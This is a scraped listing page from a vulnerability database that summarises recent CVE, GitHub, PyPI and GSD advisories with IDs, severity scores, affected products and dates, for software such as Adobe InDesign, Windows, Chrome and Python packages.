Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-h98p-vh5q-r8r5 (github) InCopy versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds write vulnerability tha... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-gc37-36hv-jv75 (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds write vulnera... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-8xh5-x5x7-h3c4 (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds write vulnera... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-8pph-m53m-wh6x (github) InCopy versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds write vulnerability tha... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-7w47-43m5-pjgg (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds write vulnera... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-7rxq-q23f-jf3q (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-6rwg-325v-9cr3 (github) InCopy versions 20.4, 19.5.4 and earlier are affected by a Heap-based Buffer Overflow vulnerabili... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-6r9g-2mc5-3vh2 (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by an out-of-bounds read vulnerab... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-69w8-7675-8vrf (github) InCopy versions 20.4, 19.5.4 and earlier are affected by a Heap-based Buffer Overflow vulnerabili... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-62wg-phh9-qp3f (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by a Heap-based Buffer Overflow v... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-5469-cfx5-x4hj (github) InCopy versions 20.4, 19.5.4 and earlier are affected by a Heap-based Buffer Overflow vulnerabili... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-53cj-vf7m-36gc (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-4q6j-qgrq-8x6x (github) InDesign Desktop versions 20.4, 19.5.4 and earlier are affected by an Access of Uninitialized Poi... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-455w-9px7-8rw5 (github) Substance3D - Sampler versions 5.0.3 and earlier are affected by an out-of-bounds read vulnerabil... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-3pf8-3ff2-j8gc (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-2vxj-pxvw-7hx9 (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:22Z 2025-08-12T21:31:22Z
ghsa-wrvq-m3xr-4q4c (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-vpqm-gwg6-v658 (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an Uncontrolled Search Path Ele... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-vph2-mfc8-qxp4 (github) Animate versions 23.0.12, 24.0.9 and earlier are affected by a Use After Free vulnerability that ... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-rg88-mh9w-9wrw (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-qmhx-8878-5fm9 (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds write vulnerab... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-q75f-gp3w-mr34 (github) IBM WebSphere Application Server Liberty 17.0.0.3 through 25.0.0.8 is vulnerable to stored cros... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-q5v5-3f7q-x42r (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-q44p-h8mm-968p (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-q2cj-f78f-vg3c (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-mr7r-v8hm-8g4q (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-m574-9366-9235 (github) Substance3D - Viewer versions 0.25 and earlier are affected by an out-of-bounds write vulnerabili... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-jc24-hjq6-4g6f (github) A improper handling of parameters in Fortinet FortiWeb versions 7.6.3 and below, versions 7.4.7 a... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-g7m9-828p-wqq9 (github) Substance3D - Painter versions 11.0.2 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
ghsa-cqv9-fwfq-qfxg (github) Substance3D - Modeler versions 1.22.0 and earlier are affected by an out-of-bounds read vulnerabi... 2025-08-12T21:31:21Z 2025-08-12T21:31:21Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2025-53729 (NVD) CVSS-v3.1: 7.8 Microsoft Azure File Sync Elevation of Privilege Vulnerability Microsoft
 Azure File Sync
 2025-08-12T17:09:44.551Z 2025-08-13T04:00:26.052Z
cve-2025-53149 (NVD) CVSS-v3.1: 7.8 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
 Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows Server 2025 (Server Core installation)
Windows 11 version 22H3
Windows 11 Version 23H2
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 24H2
Windows Server 2025
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 Service Pack 2 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
 2025-08-12T17:10:20.207Z 2025-08-13T04:00:24.961Z
cve-2025-50176 (NVD) CVSS-v3.1: 7.8 DirectX Graphics Kernel Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
 Windows Server 2022
Windows 11 version 22H2
Windows Server 2025 (Server Core installation)
Windows 11 version 22H3
Windows 11 Version 23H2
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 24H2
Windows Server 2025
 2025-08-12T17:10:09.560Z 2025-08-13T04:00:23.807Z
cve-2025-53135 (NVD) CVSS-v3.1: 7 DirectX Graphics Kernel Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
 Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows Server 2025 (Server Core installation)
Windows 11 version 22H3
Windows 11 Version 23H2
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 24H2
Windows Server 2025
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
 2025-08-12T17:10:13.050Z 2025-08-13T04:00:22.709Z
cve-2025-49707 (NVD) CVSS-v3.1: 7.9 Azure Virtual Machines Spoofing Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
 DCasv5-series Azure VM
DCadsv5-series Azure VM
ECasv5-series Azure VM
ECadsv5-series Azure VM
DCesv5-series - Azure VM
DCedsv5-series Azure VM
ECesv5-series Azure VM
ECedsv5-series Azure VM
NCCadsH100v5-series Azure VM
DCesv6-series Azure VM
Ecesv6-series Azure VM
 2025-08-12T17:10:47.689Z 2025-08-13T04:00:21.594Z
cve-2025-47954 (NVD) CVSS-v3.1: 8.8 Microsoft SQL Server Elevation of Privilege Vulnerability Microsoft
Microsoft
 Microsoft SQL Server 2022 (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 20)
 2025-08-12T17:10:30.610Z 2025-08-13T04:00:20.354Z
cve-2025-24999 (NVD) CVSS-v3.1: 8.8 Microsoft SQL Server Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
 Microsoft SQL Server 2017 (GDR)
Microsoft SQL Server 2019 (GDR)
Microsoft SQL Server 2016 Service Pack 3 (GDR)
Microsoft SQL Server 2016 Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 (CU 31)
Microsoft SQL Server 2022 (GDR)
Microsoft SQL Server 2019 (CU 32)
Microsoft SQL Server 2022 for x64-based Systems (CU 20)
 2025-08-12T17:09:49.750Z 2025-08-13T04:00:19.212Z
cve-2025-54948 (NVD) CVSS-v3.1: 9.4 A vulnerability in Trend Micro Apex One (on-premise) management console could allow a pre-authenticated remote attacker to upload malicious code and execute commands on affected installations. Trend Micro, Inc.
 Trend Micro Apex One
 2025-08-05T13:00:19.905Z 2025-08-13T04:00:17.760Z
cve-2025-8491 (NVD) Easy restaurant menu manager <= 2.0.2 - Cross-Site Request Forgery to Menu Upload nikelschubert
 Easy restaurant menu manager
 2025-08-13T03:42:04.071Z 2025-08-13T03:42:04.071Z
cve-2025-0818 (NVD) Multiple elFinder Plugins <= (Various Versions) - Directory Traversal to Arbitrary File Deletion ninjateam
saadiqbal
mndpsingh287
 File Manager Pro – Filester
Advanced File Manager – Ultimate WP File Manager And Document Library Solution
File Manager
 2025-08-13T03:42:04.514Z 2025-08-13T03:42:04.514Z
cve-2025-8891 (NVD) OceanWP <= 4.0.9 - 4.1.1 - Cross-Site Request Forgery to Ocean Extra Plugin Installation oceanwp
 OceanWP
 2025-08-13T03:42:03.487Z 2025-08-13T03:42:03.487Z
cve-2025-8882 (NVD) N/A Use after free in Aura in Google Chrome prior to 139.0.7258.127 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) Google
 Chrome
 2025-08-13T02:43:45.162Z 2025-08-13T02:43:45.162Z
cve-2025-8901 (NVD) N/A Out of bounds write in ANGLE in Google Chrome prior to 139.0.7258.127 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) Google
 Chrome
 2025-08-13T02:43:44.252Z 2025-08-13T02:43:44.252Z
cve-2025-8881 (NVD) N/A Inappropriate implementation in File Picker in Google Chrome prior to 139.0.7258.127 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) Google
 Chrome
 2025-08-13T02:43:44.561Z 2025-08-13T02:43:44.561Z
cve-2025-8880 (NVD) N/A Race in V8 in Google Chrome prior to 139.0.7258.127 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) Google
 Chrome
 2025-08-13T02:43:43.711Z 2025-08-13T02:43:43.711Z
cve-2025-8879 (NVD) N/A Heap buffer overflow in libaom in Google Chrome prior to 139.0.7258.127 allowed a remote attacker to potentially exploit heap corruption via a curated set of gestures. (Chromium security severity: High) Google
 Chrome
 2025-08-13T02:43:43.287Z 2025-08-13T02:43:43.287Z
cve-2025-4410 (NVD) CVSS-v3.1: 7.5 SetupUtility: A buffer overflow vulnerability leads to arbitrary code execution. Insyde Software
 InsydeH2O
 2025-08-13T01:49:47.629Z 2025-08-13T01:49:47.629Z
cve-2025-4277 (NVD) CVSS-v3.1: 7.5 Tcg2Smm: improper input validation may lead to arbitrary code execution Insyde Software
 InsydeH2O
 2025-08-13T01:46:22.998Z 2025-08-13T01:46:22.998Z
cve-2025-4276 (NVD) CVSS-v3.1: 7.5 UsbCoreDxe: improper input validation may lead to arbitrary code execution Insyde Software
 InsydeH2O
 2025-08-13T01:41:56.834Z 2025-08-13T01:41:56.834Z
cve-2025-49456 (NVD) CVSS-v3.1: 6.2 Zoom Clients for Windows- Race Condition Zoom Communications Inc
 Zoom Clients for Windows
 2025-08-12T22:52:22.718Z 2025-08-12T22:54:46.093Z
cve-2025-49457 (NVD) CVSS-v3.1: 9.6 Zoom Clients for Windows - Untrusted Search Path Zoom Communications Inc
 Zoom Clients for Windows
 2025-08-12T22:54:20.362Z 2025-08-12T22:54:20.362Z
cve-2025-54238 (NVD) CVSS-v3.1: 5.5 Dimension | Out-of-bounds Read (CWE-125) Adobe
 Dimension
 2025-08-12T22:33:09.215Z 2025-08-12T22:33:09.215Z
cve-2013-3893 (NVD) N/A Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll. n/a
 n/a
 2013-09-18T10:00:00.000Z 2025-08-12T22:20:24.513Z
cve-2007-0671 (NVD) N/A Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks. n/a
 n/a
 2007-02-03T01:00:00.000Z 2025-08-12T22:20:24.146Z
cve-2025-8088 (NVD) CVSS-v4.0: 8.4 Path traversal vulnerability in WinRAR win.rar GmbH
 WinRAR
 2025-08-08T11:11:41.842Z 2025-08-12T22:20:23.816Z
cve-2025-8395 (NVD) N/A {'providerMetadata': {'orgId': 'ceab7361-8a18-47b1-92ba-4d7d25f6715a', 'shortName': 'GitLab', 'dateUpdated': '2025-08-12T22:19:07.161Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}]} N/A N/A 2025-08-12T22:19:07.161Z
cve-2025-54233 (NVD) CVSS-v3.1: 5.5 Adobe Framemaker | Out-of-bounds Read (CWE-125) Adobe
 Adobe Framemaker
 2025-08-12T22:17:47.010Z 2025-08-12T22:17:47.010Z
cve-2025-54230 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:46.249Z 2025-08-12T22:17:46.249Z
cve-2025-54232 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:45.489Z 2025-08-12T22:17:45.489Z
cve-2025-54231 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:44.701Z 2025-08-12T22:17:44.701Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2025-8395 (NVD) N/A {'providerMetadata': {'orgId': 'ceab7361-8a18-47b1-92ba-4d7d25f6715a', 'shortName': 'GitLab', 'dateUpdated': '2025-08-12T22:19:07.161Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}]} N/A N/A 2025-08-12T22:19:07.161Z
cve-2025-54238 (NVD) CVSS-v3.1: 5.5 Dimension | Out-of-bounds Read (CWE-125) Adobe
 Dimension
 2025-08-12T22:33:09.215Z 2025-08-12T22:33:09.215Z
cve-2025-54233 (NVD) CVSS-v3.1: 5.5 Adobe Framemaker | Out-of-bounds Read (CWE-125) Adobe
 Adobe Framemaker
 2025-08-12T22:17:47.010Z 2025-08-12T22:17:47.010Z
cve-2025-54232 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:45.489Z 2025-08-12T22:17:45.489Z
cve-2025-54231 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:44.701Z 2025-08-12T22:17:44.701Z
cve-2025-54230 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:46.249Z 2025-08-12T22:17:46.249Z
cve-2025-54229 (NVD) CVSS-v3.1: 7.8 Adobe Framemaker | Use After Free (CWE-416) Adobe
 Adobe Framemaker
 2025-08-12T22:17:43.894Z 2025-08-12T22:17:43.894Z
cve-2025-49457 (NVD) CVSS-v3.1: 9.6 Zoom Clients for Windows - Untrusted Search Path Zoom Communications Inc
 Zoom Clients for Windows
 2025-08-12T22:54:20.362Z 2025-08-12T22:54:20.362Z
cve-2025-49456 (NVD) CVSS-v3.1: 6.2 Zoom Clients for Windows- Race Condition Zoom Communications Inc
 Zoom Clients for Windows
 2025-08-12T22:52:22.718Z 2025-08-12T22:54:46.093Z
cve-2025-54222 (NVD) CVSS-v3.1: 7.8 Substance3D - Stager | Out-of-bounds Write (CWE-787) Adobe
 Substance3D - Stager
 2025-08-12T21:46:17.193Z 2025-08-12T21:46:17.193Z
cve-2025-55171 (NVD) WeGIA Anonymous Attacker can Delete Arbitrary Image file at endpoint `/html/personalizacao_remover.php` LabRedesCefetRJ
 WeGIA
 2025-08-12T20:17:19.932Z 2025-08-12T20:27:35.508Z
cve-2025-55170 (NVD) WeGIA reflected XSS via `verificacao` and `redir_config` param at endpoint `/html/alterar_senha.php` LabRedesCefetRJ
 WeGIA
 2025-08-12T20:12:33.796Z 2025-08-12T20:29:01.054Z
cve-2025-55165 (NVD) Autocaliweb Exposure of Sensitive Information to an Unauthorized Actor in `config_sql.py` gelbphoenix
 autocaliweb
 2025-08-12T20:52:41.789Z 2025-08-12T20:52:41.789Z
cve-2025-54235 (NVD) CVSS-v3.1: 5.5 Substance3D - Modeler | Out-of-bounds Read (CWE-125) Adobe
 Substance3D - Modeler
 2025-08-12T20:36:10.870Z 2025-08-12T20:50:20.303Z
cve-2025-54228 (NVD) CVSS-v3.1: 5.5 InDesign Desktop | Out-of-bounds Read (CWE-125) Adobe
 InDesign Desktop
 2025-08-12T20:54:53.868Z 2025-08-12T20:54:53.868Z
cve-2025-54227 (NVD) CVSS-v3.1: 5.5 InDesign Desktop | Out-of-bounds Read (CWE-125) Adobe
 InDesign Desktop
 2025-08-12T20:54:54.607Z 2025-08-12T20:54:54.607Z
cve-2025-54226 (NVD) CVSS-v3.1: 7.8 InDesign Desktop | Use After Free (CWE-416) Adobe
 InDesign Desktop
 2025-08-12T20:54:53.101Z 2025-08-12T20:54:53.101Z
cve-2025-54225 (NVD) CVSS-v3.1: 7.8 InDesign Desktop | Use After Free (CWE-416) Adobe
 InDesign Desktop
 2025-08-12T20:54:57.039Z 2025-08-12T20:54:57.039Z
cve-2025-54224 (NVD) CVSS-v3.1: 7.8 InDesign Desktop | Use After Free (CWE-416) Adobe
 InDesign Desktop
 2025-08-12T20:54:59.419Z 2025-08-12T20:54:59.419Z
cve-2025-54223 (NVD) CVSS-v3.1: 7.8 InCopy | Use After Free (CWE-416) Adobe
 InCopy
 2025-08-12T21:01:32.173Z 2025-08-12T21:01:32.173Z
cve-2025-54221 (NVD) CVSS-v3.1: 7.8 InCopy | Out-of-bounds Write (CWE-787) Adobe
 InCopy
 2025-08-12T21:01:30.617Z 2025-08-12T21:01:30.617Z
cve-2025-54220 (NVD) CVSS-v3.1: 7.8 InCopy | Heap-based Buffer Overflow (CWE-122) Adobe
 InCopy
 2025-08-12T21:01:29.783Z 2025-08-12T21:01:29.783Z
cve-2025-54219 (NVD) CVSS-v3.1: 7.8 InCopy | Heap-based Buffer Overflow (CWE-122) Adobe
 InCopy
 2025-08-12T21:01:31.401Z 2025-08-12T21:01:31.401Z
cve-2025-54218 (NVD) CVSS-v3.1: 7.8 InCopy | Out-of-bounds Write (CWE-787) Adobe
 InCopy
 2025-08-12T21:01:32.983Z 2025-08-12T21:01:32.983Z
cve-2025-54217 (NVD) CVSS-v3.1: 7.8 InCopy | Heap-based Buffer Overflow (CWE-122) Adobe
 InCopy
 2025-08-12T21:01:35.047Z 2025-08-12T21:01:35.047Z
cve-2025-54216 (NVD) CVSS-v3.1: 7.8 InCopy | Out-of-bounds Write (CWE-787) Adobe
 InCopy
 2025-08-12T21:01:35.837Z 2025-08-12T21:01:35.837Z
cve-2025-54215 (NVD) CVSS-v3.1: 7.8 InCopy | Out-of-bounds Write (CWE-787) Adobe
 InCopy
 2025-08-12T21:01:34.243Z 2025-08-12T21:01:34.243Z
cve-2025-54214 (NVD) CVSS-v3.1: 5.5 InDesign Desktop | Out-of-bounds Read (CWE-125) Adobe
 InDesign Desktop
 2025-08-12T20:55:00.442Z 2025-08-12T20:55:00.442Z
cve-2025-54213 (NVD) CVSS-v3.1: 7.8 InDesign Desktop | Out-of-bounds Write (CWE-787) Adobe
 InDesign Desktop
 2025-08-12T20:54:58.607Z 2025-08-12T20:54:58.607Z
cve-2025-54212 (NVD) CVSS-v3.1: 7.8 InDesign Desktop | Heap-based Buffer Overflow (CWE-122) Adobe
 InDesign Desktop
 2025-08-12T20:54:52.282Z 2025-08-12T20:54:52.282Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
pysec-2025-34 The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_c... 2025-04-24T01:15:49+00:00 2025-04-24T03:08:15.436691+00:00
pysec-2025-33 Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precomp... 2025-01-14T18:16:05+00:00 2025-04-23T21:23:01.322686+00:00
pysec-2025-32 BentoML is a Python library for building online serving systems optimized for AI apps and model i... 2025-04-09T16:15:25+00:00 2025-04-22T19:21:34.073355+00:00
pysec-2025-31 vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statements by fi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.116292+00:00
pysec-2025-30 vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single expressi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.064106+00:00
pysec-2025-29 vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the babyloni... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.005382+00:00
pysec-2025-28 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.772920+00:00
pysec-2025-27 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.711157+00:00
pysec-2025-26 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.645758+00:00
pysec-2021-891 CWE - CWE-287: Improper Authentication vulnerability in SUSE Linux Enterprise Server 15 SP 3; ope... 2021-03-03T10:15:13+00:00 2025-04-09T17:27:27.582884+00:00
pysec-2025-25 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the CORS middleware is ... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.532849+00:00
pysec-2025-24 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the /api/remove endpoin... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.486485+00:00
pysec-2025-23 Versions of the package ray before 2.43.0 are vulnerable to Insertion of Sensitive Information in... 2025-03-06T05:15:16+00:00 2025-04-09T17:27:27.434099+00:00
pysec-2022-43179 Poetry is a dependency manager for Python. To handle dependencies that come from a Git repository... 2022-09-07T19:15:08+00:00 2025-04-09T17:27:27.255151+00:00
pysec-2025-22 A vulnerability, that could result in Remote Code Execution (RCE), has been found in PlotAI. Lack... 2025-03-10T14:15:24+00:00 2025-04-09T17:27:27.203714+00:00
pysec-2023-311 plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depending on,... 2023-09-21T15:15:10+00:00 2025-04-09T17:27:27.153848+00:00
pysec-2025-21 picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives whe... 2025-03-10T12:15:12+00:00 2025-04-09T17:27:27.016747+00:00
pysec-2025-20 picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to cra... 2025-03-10T12:15:10+00:00 2025-04-09T17:27:26.966215+00:00
pysec-2025-19 picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vuln... 2025-03-03T19:15:34+00:00 2025-04-09T17:27:26.916350+00:00
pysec-2025-18 picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a mali... 2025-02-26T15:15:24+00:00 2025-04-09T17:27:26.867210+00:00
pysec-2023-310 Mobile Security Framework (MobSF) <=v3.7.8 Beta is vulnerable to Insecure Permissions. NOTE: the ... 2023-09-21T22:15:11+00:00 2025-04-09T17:27:26.663665+00:00
pysec-2025-17 In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a pa... 2025-03-20T10:15:54+00:00 2025-04-09T17:27:26.322333+00:00
pysec-2023-309 Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13T00:15:07+00:00 2025-04-09T17:27:26.271200+00:00
pysec-2023-308 Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. 2023-07-19T01:15:10+00:00 2025-04-09T17:27:26.223213+00:00
pysec-2025-16 LNbits is a Lightning wallet and accounts system. A Server-Side Request Forgery (SSRF) vulnerabil... 2025-04-06T20:15:15+00:00 2025-04-09T17:27:25.872691+00:00
pysec-2025-15 Flask-AppBuilder is an application development framework. Prior to 4.5.3, Flask-AppBuilder allows... 2025-03-03T16:15:41+00:00 2025-04-09T17:27:25.227116+00:00
pysec-2025-14 An issue was discovered in Django 5.1 before 5.1.8 and 5.0 before 5.0.14. The NFKC normalization ... 2025-04-02T13:15:44+00:00 2025-04-09T17:27:25.169049+00:00
pysec-2025-13 An issue was discovered in Django 5.1 before 5.1.7, 5.0 before 5.0.13, and 4.2 before 4.2.20. The... 2025-03-06T19:15:27+00:00 2025-04-09T17:27:25.095679+00:00
pysec-2022-43178 An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI pac... 2022-11-09T20:15:10+00:00 2025-04-09T17:27:24.793038+00:00
pysec-2022-43177 Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azur... 2022-10-25T17:15:56+00:00 2025-04-09T17:27:24.642962+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33851 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33850 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33849 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4295 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4294 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4293 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4292 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4291 The format of the source doesn't require a description, click on the link for more details
gsd-2023-52722 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48685 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48684 The format of the source doesn't require a description, click on the link for more details
gsd-2024-24777 The format of the source doesn't require a description, click on the link for more details
gsd-2024-28875 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33846 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33845 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33844 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33843 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33842 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33841 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33840 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33839 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33838 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33837 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33836 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33835 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33834 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33833 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33832 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33831 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33830 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
